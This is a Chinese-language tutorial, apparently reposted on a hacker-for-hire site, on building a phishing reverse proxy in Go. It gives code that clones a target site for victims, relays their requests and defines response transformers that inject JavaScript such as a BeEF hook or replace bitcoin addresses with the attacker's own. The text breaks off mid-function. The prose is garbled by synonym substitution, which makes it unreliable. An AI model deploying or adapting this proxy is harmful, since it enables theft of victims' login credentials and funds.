在Go中运用反向署理进行 *** 垂钓测验

访客5年前关于黑客接单1331

关于一个进犯者来说,要想施行一次 *** 垂钓进犯,往往需求做很多的准备作业。例如建立垂钓站点,诱惑受害者上钩,捕获受害者的登录凭据等。为了防止这些冗杂的进程,本文我将教咱们运用Go自动化这些进程。
完好的代码和运用说明能够在Github检查:https://github.com/JonCooperWorks/judas

署理被用来垂钓TechOnRoad用户。你能看出它们之间的不同吗?
运用署理进行 *** 垂钓
咱们的署理需求接纳来自受害者的恳求,并在发送到方针网站之前重写它们。Go有着许多在原生层面临并发编程进行支撑的优异特性,比方Goroutines、Channels等。咱们建立了一个简略的TCP侦听器,spawn了一个新的goroutine来处理每个传入的衔接和一个goroutine worker来处理恳求和呼应。成果经过channel从恳求处理goroutine传递给worker。
// HTTPTransaction represents a complete request - response flow.
type HTTPTransaction struct {
  Request  *http.Request
  Response *http.Response
}
// PhishingProxy proxies requests between the victim and the target, queuing requests and responses for further processing.
type PhishingProxy struct {
  client               *http.Client
  targetURL            *url.URL
  responseTransformers []ResponseTransformer
}
func main() {
        // ... flag parsing and whatnot
        phishingProxy := &PhishingProxy{
    client:               client,
    targetURL:            u,
    responseTransformers: responseTransformers,
  }
  transactions := make(chan *HTTPTransaction)
  go processTransactions(transactions)
  for {
    conn, err := server.Accept()
    if err != nil {
      log.Println("Error when accepting request,", err.Error())
    }
    go phishingProxy.HandleConnection(conn, transactions)
  }
}
因为Go的优异规范库,恳求处理十分简练。http包供给ReadRequest办法,用于解析从衔接中读取数据的恳求。
defer conn.Close()
reader := bufio.NewReader(conn)
request, err := http.ReadRequest(reader)
if err != nil {
  log.Println("Error parsing request:", err.Error())
  return
}
将一切内容解析成Golang http.Request后,咱们将它传递给方针。署理需求重写来自受害者的HTTP头,以防止方针站点衔接中止,特别是主机头和URL。
request.URL.Scheme = p.targetURL.Scheme
request.URL.Host = p.targetURL.Host
request.Host = p.targetURL.Host
request.RequestURI = ""
resp, err := p.client.Do(request)
if err != nil {
  log.Println("Proxy error:", err.Error())
  return
}
在署理上运用HTTP客户端,咱们建议恳求并保证恳求成功。
一旦咱们得到呼应,咱们运用传递给署理的ResponseTransformers(后面会具体介绍)转化它,运用规范库httputil.DumpResponse函数将呼应转化为字节,并将恳求和呼应发送给goroutine worker之后处理。
for _, transformer := range p.responseTransformers {
  transformer.Transform(resp)
}
modifiedResponse, err := httputil.DumpResponse(resp, true)
if err != nil {
  log.Println("Error converting requests to bytes:", err.Error())
  return
}
_, err = conn.Write(modifiedResponse)
if err != nil {
  log.Println("Error responding to victim:", err.Error())
  return
}
transactions
咱们经过一个channel将HTTP业务传递给worker,以加速咱们的操作进程防止受害者发作某些过错。
只需指向该署理,就能完美克隆方针网站。
// ResponseTransformer modifies a response in any way we see fit, such as inserting extra JavaScript.
type ResponseTransformer interface {
  Transform(response *http.Response) error
}
ResponseTransformer答应你修正呼应。咱们能够用它来任何想做的作业,例如将自界说JavaScript注入到页面,或许将比特币地址替换成咱们自己的。这关于那些在默许署理中无法100%作业的网站也很有用。
JavaScriptInjectionTransformer运用GoQuery将HTML呼应解析到DOM树中,并运用咱们传递给transformer的URL注入脚本标签。咱们能够运用它来注入BeEF hook或绕过网站的安全防护。
// JavaScriptInjectionTransformer holds JavaScript filename for injecting into response.
type JavaScriptInjectionTransformer struct {
  javascriptURL string
}
// Transform Injects JavaScript into an HTML response.
func (j JavaScriptInjectionTransformer) Transform(response *http.Response) error {

[1] [2]  黑客接单网

相关文章

XLoader与FakeSpy的相关以及与Yanbian Gang的联系

XLoader和FakeSpy是最近手机要挟范畴两款干流的歹意软件宗族。XLoader最早是2019年4月被陈述运用DNS缓存投毒或DNS诈骗技能来用歹意安卓APP从受害者设备中盗取PII和金融数据,...

DVWA 1.10 High等级的CSRF另类通关法-黑客接单平台

网上有许多关于CSRF High等级的通关记载,可是都有一个缺点,没有做到主动触发修正暗码。这儿记载了我在解题时的思路,趁便共享出来抛砖引玉,期望大佬们不吝赐教哈 0×00 简略剖析一下CSRF后端...

JavaScript的注入引出技能欺诈

0×01 前语 在最近的歹意软件的查询中,咱们发现了一些风趣的混杂JavaScript代码。此代码伪装成现在盛行的插件AddThis social sharing的一部分,在URL命名约好和图画文件中...

根底事情呼应中的Volatility作业流程

最近,我发现自己需求对完好内存转储进行一些查询。通过一段时间的搜索,我发现了Volatility-Labs的这篇文章,依据其间的辅导办法,我能够很好的来评价内存转储。当然,你或许会有更好、更深度的内存...

会互联网技术和网站渗透的人能做什么有谁知道黑种人家中怎样接

尽管也没有那般的工作经验,也不知道能否帮上忙,但我讲我的想法:你通过自学互联网技术,但沒有学历,不容置疑,顾主不敢相信给你整体实力,因此你能取得资格证书(你了解);返回如...

短网址安全浅谈

何谓短网址(Short URL)?望文生义,便是形式上比较短的网址,当时首要是凭借短网址来替代原先冗长的网址,便利传输和共享。短网址服务也便是将长网址转化为短网址的服务,这种服务在便利了广阔网民的一起...